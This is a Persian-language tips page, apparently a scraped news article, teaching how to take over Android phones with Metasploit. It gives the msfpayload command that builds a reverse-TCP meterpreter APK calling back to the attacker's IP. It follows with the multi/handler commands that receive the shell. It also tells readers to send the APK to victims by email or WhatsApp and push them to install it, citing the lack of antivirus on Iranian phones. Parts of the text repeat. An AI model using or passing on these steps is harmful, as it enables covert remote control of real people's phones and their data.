آموزش هک گوشی های اندروید توسط نرم افزار MetaSploit
آموزش هک گوشی های اندروید توسط نرم افزار MetaSploit
ترفندهای موبایل،آموزش هک گوشی های اندروید توسط نرم افزار MetaSploit،نرمافزار متااسپلویت (به انگلیسی: Metasploit) یک نرمافزار قوی برای نفوذ به سیستمهای دیگر است
کد خبر: ۷۷۳۰۵
تاریخ: ۰۲ تیر ۱۳۹۴ - ۱۱:۱۸

ترفندهای موبایل،آموزش هک گوشی های اندروید توسط نرم افزار MetaSploit،نرمافزار متااسپلویت (به انگلیسی: Metasploit) یک نرمافزار قوی برای نفوذ به سیستمهای دیگر است. این نرمافزار امکان دسترسی به شل قربانی را به راحتی حتی بر روی ویندوز ۷ فراهم میکند.
این نرمافزار، برای شما پیوندی به برای آیپیتان با فایل نفوذ ایجاد میکند. کسی که روی این پیوند کلیک کند، این فایل را وارد رایانهٔ خود کرده و پس از وارد شدن این فایل به رایانهٔ فرد شما میتوانید به راحتی دستورهای گوناگون را بر روی رایانهٔ فرد قربانی اجرا کنید.
در این نوع حمله ما با استفاده از متااسپلویت اقدام به ایجاد یک فایل با پسوند APK میکنیم و به طرق مختلف سعی میکنیم این فایل رو یا از طریق ایمیل یا Whatsapp و یا . . . به تارگیت بدیم تا اون رو نصب و اجرا کنه . (کلا رو گوشی ایرانی ها هم جای یه انتی ویروس درست و حسابی خالیه و همین نبود انتی ویروس میتونه شرایطی رو واسه ما محیا کنه که حمله ما 100% جواب بده). بعد از اجرا و باز کردن فایل توسط تارگت ما میتوانیم از گوشی قربانی دسترسی بگیریم .
خوب بریم سراغ اموزش اصلی :
تارگت :
Android
تمامی نسخه های سیستم عامل اندروید
سیستم عامل حمله : بک ترک 5 یا کالی
سیستم عامل تارگت : اندروید و تمامی نسخه های موجود اندروید
گام اول :در ابتدا وارد بک ترک بشید و یه ترمینال جدید باز کنید و دستور زیر رو بنویسید و اینتر کنید ( البته میتونید از Armitage هم استفاده کنید . تفاوتی نداره ) .
در اینجا ایپی 192.168.1.16 همون ایپی هکر هست و پورت 4444 هم پروت مشخص شده جهت باز کردن Backdor

بعد از اجرا کردن دستور بالا تو شاخه موجود یک Ls بگیرید و مطمعن بشید که فایل app.apk ساخته شده باشه !

خوب حالا این فایل ساخته شده رو به گوشی اندروید هدف ( با هر روشی که خودتون میدونید ) ارسال میکنیم و اصرار میکنیم که نصب این app انجام بشه .
گام دوم : خوب واسه اینکه ما بتونیم هک گوشی هوشمند رو داشته باشیم یا به به نحوی از گوشی هدف شل بگیریم و کنترل اون رو در دست بگیریم باید handler رو ایپی خودمون ایجاد کنیم که این کار رو عینا با استفاده از دستورات زیر انجام میدیم :

در ابتدا یه یک ترمینال جدید باز میکنیم و عبارت msfconsole رو تاپیپ و اینتر میزنیم و یا از منو بالا بکترک یا کالی نرم افزار متاسپلویت رو اجرا میکنیم و بعد از وارد شدن به نرم افزار متاسپلویت دستورات زیر را وارد میکنیم
و در نهایت هنگامی که هدف بر روی دکمه بزرگ روی app نصب شده روی گوشیش کلیک کنه ما میتونیم از گوشی اون شل بگیریم

این نرمافزار، برای شما پیوندی به برای آیپیتان با فایل نفوذ ایجاد میکند. کسی که روی این پیوند کلیک کند، این فایل را وارد رایانهٔ خود کرده و پس از وارد شدن این فایل به رایانهٔ فرد شما میتوانید به راحتی دستورهای گوناگون را بر روی رایانهٔ فرد قربانی اجرا کنید.
در این نوع حمله ما با استفاده از متااسپلویت اقدام به ایجاد یک فایل با پسوند APK میکنیم و به طرق مختلف سعی میکنیم این فایل رو یا از طریق ایمیل یا Whatsapp و یا . . . به تارگیت بدیم تا اون رو نصب و اجرا کنه . (کلا رو گوشی ایرانی ها هم جای یه انتی ویروس درست و حسابی خالیه و همین نبود انتی ویروس میتونه شرایطی رو واسه ما محیا کنه که حمله ما 100% جواب بده). بعد از اجرا و باز کردن فایل توسط تارگت ما میتوانیم از گوشی قربانی دسترسی بگیریم .
خوب بریم سراغ اموزش اصلی :
تارگت :
Android
تمامی نسخه های سیستم عامل اندروید
سیستم عامل حمله : بک ترک 5 یا کالی
سیستم عامل تارگت : اندروید و تمامی نسخه های موجود اندروید
گام اول :در ابتدا وارد بک ترک بشید و یه ترمینال جدید باز کنید و دستور زیر رو بنویسید و اینتر کنید ( البته میتونید از Armitage هم استفاده کنید . تفاوتی نداره ) .
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R > app.apk
در اینجا ایپی 192.168.1.16 همون ایپی هکر هست و پورت 4444 هم پروت مشخص شده جهت باز کردن Backdor


گام دوم : خوب واسه اینکه ما بتونیم هک گوشی هوشمند رو داشته باشیم یا به به نحوی از گوشی هدف شل بگیریم و کنترل اون رو در دست بگیریم باید handler رو ایپی خودمون ایجاد کنیم که این کار رو عینا با استفاده از دستورات زیر انجام میدیم :

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.16 (enter your Kali IP address
set lport 4444
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.16 (enter your Kali IP address
set lport 4444
و در اخر برای اجرا handler عبارت exploit را تایپ کرده و اینتر میزنیم :
و در نهایت هنگامی که هدف بر روی دکمه بزرگ روی app نصب شده روی گوشیش کلیک کنه ما میتونیم از گوشی اون شل بگیریم

منبع :pars-tech.net
کلمات کلیدی :
نظرات بییندگان :
مطالب مشابه :